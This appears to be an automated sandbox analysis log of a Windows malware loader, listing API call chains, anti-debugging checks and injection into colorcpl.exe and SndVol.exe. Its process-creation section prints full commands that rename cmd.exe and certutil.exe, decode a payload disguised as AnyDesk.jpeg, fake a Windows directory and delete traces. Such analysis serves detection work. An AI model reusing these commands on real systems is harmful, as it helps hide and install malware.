Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	6_2_00007FF6A2AA234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	6_2_00007FF6A2A3C6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	6_2_00007FF6A2AA6F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF6A2AA10C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF6A2AA3100
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF6A2A4B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A0D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A0D440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	6_2_00007FF6A2A4D4A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A83674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	6_2_00007FF6A2A83674
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	6_2_00007FF6A2A4DBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA19F8 #359,FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF6A2AA19F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	6_2_00007FF6A2AA1B04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A45E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	6_2_00007FF6A2A45E58
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	9_2_02AA5908
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF7823E2978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF7823E823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF7823F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF7823D1560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF7823D35B8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	11_2_00007FF7823E2978
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	11_2_00007FF7823E823C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,	11_2_00007FF7823F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	11_2_00007FF7823D1560
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	11_2_00007FF7823D35B8
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00860207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	16_2_00860207
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0086589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	16_2_0086589A
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00864EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	16_2_00864EC1
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00873E66 FindFirstFileW,FindNextFileW,FindClose,	16_2_00873E66
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0085532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	16_2_0085532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_0040928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	19_2_0041C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	19_2_0040C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_004096A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	19_2_00408847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00407877 FindFirstFileW,FindNextFileW,	19_2_00407877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	19_2_0040BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,	19_2_00419B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	19_2_0040BD72
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F485AE FindFirstFileW,FindNextFileW,	19_2_06F485AE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4A3D7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_06F4A3D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4CAA9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	19_2_06F4CAA9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5A8BD FindFirstFileW,	19_2_06F5A8BD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4C8A2 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	19_2_06F4C8A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4957E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	19_2_06F4957E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F4D0BF FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	19_2_06F4D0BF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5D059 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	19_2_06F5D059
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F49FC5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	19_2_06F49FC5

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

19_2_00407CD2

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6A2A8511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,

6_2_00007FF6A2A8511C

Source: Puyiaiob.PIF, 0000001F.00000002.2046639018.000000000075D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: AnyDesk.PIF, 00000009.00000002.1845207168.0000000000620000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.0000000000634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942625529.0000000000940000.00000004.00000020.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001C.00000002.1965697628.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\Public\Libraries\AnyDesk.PIF	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\colorcpl.exe	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\AnyDesk.PIF

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\Public\Libraries\AnyDesk.PIF

Code function: 9_2_02ABF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

9_2_02ABF744

Source: C:\Users\Public\Libraries\AnyDesk.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Process queried: DebugPort

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7823F63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF7823F63FC

Source: C:\Users\Public\Libraries\AnyDesk.PIF

Code function: 9_2_02AB894C LoadLibraryW,GetProcAddress,FreeLibrary,

9_2_02AB894C

Source: C:\Users\Public\alpha.pif	Code function: 16_2_0087C1FA mov eax, dword ptr fs:[00000030h]	16_2_0087C1FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00443355 mov eax, dword ptr fs:[00000030h]	19_2_00443355
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F410DD mov eax, dword ptr fs:[00000030h]	19_2_06F410DD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F410DD mov eax, dword ptr fs:[00000030h]	19_2_06F410DD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F8408C mov eax, dword ptr fs:[00000030h]	19_2_06F8408C

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7823E4D5C InitializeCriticalSection,SetConsoleCtrlHandler,_get_osfhandle,GetConsoleMode,_get_osfhandle,GetConsoleMode,GetCommandLineW,GetCommandLineW,GetWindowsDirectoryW,GetConsoleOutputCP,GetCPInfo,GetProcessHeap,HeapAlloc,GetConsoleTitleW,GetStdHandle,GetConsoleScreenBufferInfo,GlobalFree,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,free,

3_2_00007FF7823E4D5C

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF7823E8FA4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E93B0 SetUnhandledExceptionFilter,	3_2_00007FF7823E93B0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF7823E8FA4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E93B0 SetUnhandledExceptionFilter,	5_2_00007FF7823E93B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AD4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF6A2AD4E18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AD53E0 SetUnhandledExceptionFilter,	6_2_00007FF6A2AD53E0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF7823E8FA4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E93B0 SetUnhandledExceptionFilter,	10_2_00007FF7823E93B0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF7823E8FA4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E93B0 SetUnhandledExceptionFilter,	11_2_00007FF7823E93B0
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00866EC0 SetUnhandledExceptionFilter,	16_2_00866EC0
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00866B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00866B40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0043503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00434A8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0043BB71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_00434BD8 SetUnhandledExceptionFilter,	19_2_00434BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F7C8A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_06F7C8A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F757C1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_06F757C1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F75D73 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_06F75D73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F7590F SetUnhandledExceptionFilter,	19_2_06F7590F

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6F40000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4A70000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Users\Public\Libraries\AnyDesk.PIF	Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6F41628			Jump to behavior
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 4A71628

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\kn.exe

Jump to dropped file

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6F40000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory written: C:\Windows\SysWOW64\SndVol.exe base: 4A70000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6F40000			Jump to behavior
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory written: C:\Windows\SysWOW64\SndVol.exe base: 4A70000

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

19_2_00412132

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6A2A87024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,

6_2_00007FF6A2A87024

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_00419662 mouse_event,

19_2_00419662

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6A2A74AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,

6_2_00007FF6A2A74AF4

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6A2A84E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,

6_2_00007FF6A2A84E98

Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager7T\
Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managernfoz
Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managernet
Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, logs.dat.19.dr	Binary or memory string: [Program Manager]

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_00434CB6 cpuid

19_2_00434CB6

Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	3_2_00007FF7823E51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	3_2_00007FF7823E3140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	3_2_00007FF7823D6EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	5_2_00007FF7823E51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	5_2_00007FF7823E3140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	5_2_00007FF7823D6EE4
Source: C:\Users\Public\kn.exe	Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,	6_2_00007FF6A2AD3800
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	9_2_02AA5ACC
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: GetLocaleInfoA,	9_2_02AAA7C4
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	9_2_02AA5BD8
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: GetLocaleInfoA,	9_2_02AAA810
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	10_2_00007FF7823E51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	10_2_00007FF7823E3140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	10_2_00007FF7823D6EE4
